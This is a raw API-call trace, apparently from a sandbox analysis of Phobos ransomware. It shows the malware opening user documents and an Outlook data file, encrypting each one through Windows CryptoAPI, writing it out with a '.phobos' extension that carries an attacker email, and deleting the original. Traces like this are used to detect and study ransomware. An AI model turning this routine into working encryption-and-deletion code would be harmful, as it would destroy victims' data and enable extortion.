GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=29741) returned 1 [0196.951] CloseHandle (hObject=0xb0) returned 1 [0196.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GNE8Qh4.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gne8qh4.docx")) returned 0x20 [0196.951] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GNE8Qh4.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gne8qh4.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GNE8Qh4.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gne8qh4.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.951] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.951] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GNE8Qh4.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gne8qh4.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.952] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.952] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.952] ReadFile (in: hFile=0xb0, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x742d, lpOverlapped=0x0) returned 1 [0196.956] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7430, dwBufLen=0x7430 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7430) returned 1 [0196.956] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7430, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7430, lpOverlapped=0x0) returned 1 [0196.957] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0196.957] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.957] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0196.957] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0196.957] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0196.957] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.957] CloseHandle (hObject=0xb0) returned 1 [0196.957] CloseHandle (hObject=0x124) returned 1 [0196.957] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GNE8Qh4.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gne8qh4.docx")) returned 1 [0196.958] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\h5YwO4Ok9d1jB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h5ywo4ok9d1jb.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.959] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=52681) returned 1 [0196.959] CloseHandle (hObject=0x124) returned 1 [0196.959] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\h5YwO4Ok9d1jB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h5ywo4ok9d1jb.pptx")) returned 0x20 [0196.959] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\h5YwO4Ok9d1jB.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h5ywo4ok9d1jb.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\h5YwO4Ok9d1jB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h5ywo4ok9d1jb.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.959] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.960] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\h5YwO4Ok9d1jB.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h5ywo4ok9d1jb.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.960] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.960] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.960] ReadFile (in: hFile=0x124, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xcdc9, lpOverlapped=0x0) returned 1 [0196.967] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xcdd0, dwBufLen=0xcdd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xcdd0) returned 1 [0196.967] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xcdd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xcdd0, lpOverlapped=0x0) returned 1 [0196.969] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0196.969] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.969] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0196.969] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0196.969] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0196.969] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.969] CloseHandle (hObject=0x124) returned 1 [0196.969] CloseHandle (hObject=0xb0) returned 1 [0196.969] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\h5YwO4Ok9d1jB.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h5ywo4ok9d1jb.pptx")) returned 1 [0196.970] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXUq7CwZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixuq7cwz.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.971] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=12949) returned 1 [0196.971] CloseHandle (hObject=0xb0) returned 1 [0196.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXUq7CwZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixuq7cwz.docx")) returned 0x20 [0196.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXUq7CwZ.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixuq7cwz.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXUq7CwZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixuq7cwz.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.971] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.971] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXUq7CwZ.docx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixuq7cwz.docx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.972] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.972] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.972] ReadFile (in: hFile=0xb0, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3295, lpOverlapped=0x0) returned 1 [0196.974] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x32a0, dwBufLen=0x32a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x32a0) returned 1 [0196.974] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x32a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x32a0, lpOverlapped=0x0) returned 1 [0196.975] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0196.975] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.975] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0196.975] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0196.975] WriteFile (in: hFile=0x124, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0196.975] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.976] CloseHandle (hObject=0xb0) returned 1 [0196.976] CloseHandle (hObject=0x124) returned 1 [0196.976] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXUq7CwZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixuq7cwz.docx")) returned 1 [0196.977] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0196.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jFlmEksOzI.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jflmeksozi.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.977] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=95291) returned 1 [0196.977] CloseHandle (hObject=0x124) returned 1 [0196.977] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jFlmEksOzI.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jflmeksozi.pptx")) returned 0x20 [0196.977] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jFlmEksOzI.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jflmeksozi.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jFlmEksOzI.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jflmeksozi.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0196.978] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.978] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0196.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jFlmEksOzI.pptx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jflmeksozi.pptx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0196.978] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0196.978] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0196.978] ReadFile (in: hFile=0x124, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1743b, lpOverlapped=0x0) returned 1 [0197.074] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x17440, dwBufLen=0x17440 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x17440) returned 1 [0197.074] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x17440, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x17440, lpOverlapped=0x0) returned 1 [0197.076] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32be8) returned 1 [0197.076] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0197.076] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0197.076] CryptDestroyKey (hKey=0xa32be8) returned 1 [0197.076] WriteFile (in: hFile=0xb0, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0197.077] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0197.077] CloseHandle (hObject=0x124) returned 1 [0197.077] CloseHandle (hObject=0xb0) returned 1 [0197.077] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jFlmEksOzI.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jflmeksozi.pptx")) returned 1 [0197.078] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0197.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\bClrz8XbVVch.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\bclrz8xbvvch.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0197.201] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=47011) returned 1 [0197.201] CloseHandle (hObject=0xac) returned 1 [0197.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\bClrz8XbVVch.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\bclrz8xbvvch.pdf")) returned 0x20 [0197.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\bClrz8XbVVch.pdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\bclrz8xbvvch.pdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\bClrz8XbVVch.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\bclrz8xbvvch.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0197.201] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0197.201] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0197.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\bClrz8XbVVch.pdf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\bclrz8xbvvch.pdf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.686] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0197.686] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0197.686] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb7a3, lpOverlapped=0x0) returned 1 [0197.687] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb7b0, dwBufLen=0xb7b0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb7b0) returned 1 [0197.688] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb7b0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb7b0, lpOverlapped=0x0) returned 1 [0197.690] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328a8) returned 1 [0197.690] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0197.690] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0197.690] CryptDestroyKey (hKey=0xa328a8) returned 1 [0197.690] WriteFile (in: hFile=0x140, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0197.690] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.690] CloseHandle (hObject=0xac) returned 1 [0197.690] CloseHandle (hObject=0x140) returned 1 [0197.691] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\bClrz8XbVVch.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\bclrz8xbvvch.pdf")) returned 1 [0197.692] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0197.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0197.706] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=0) returned 1 [0197.706] CloseHandle (hObject=0x15c) returned 1 [0197.706] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0197.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0197.707] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=271360) returned 1 [0197.707] CloseHandle (hObject=0x15c) returned 1 [0197.707] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst")) returned 0x2020 [0197.707] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.707] 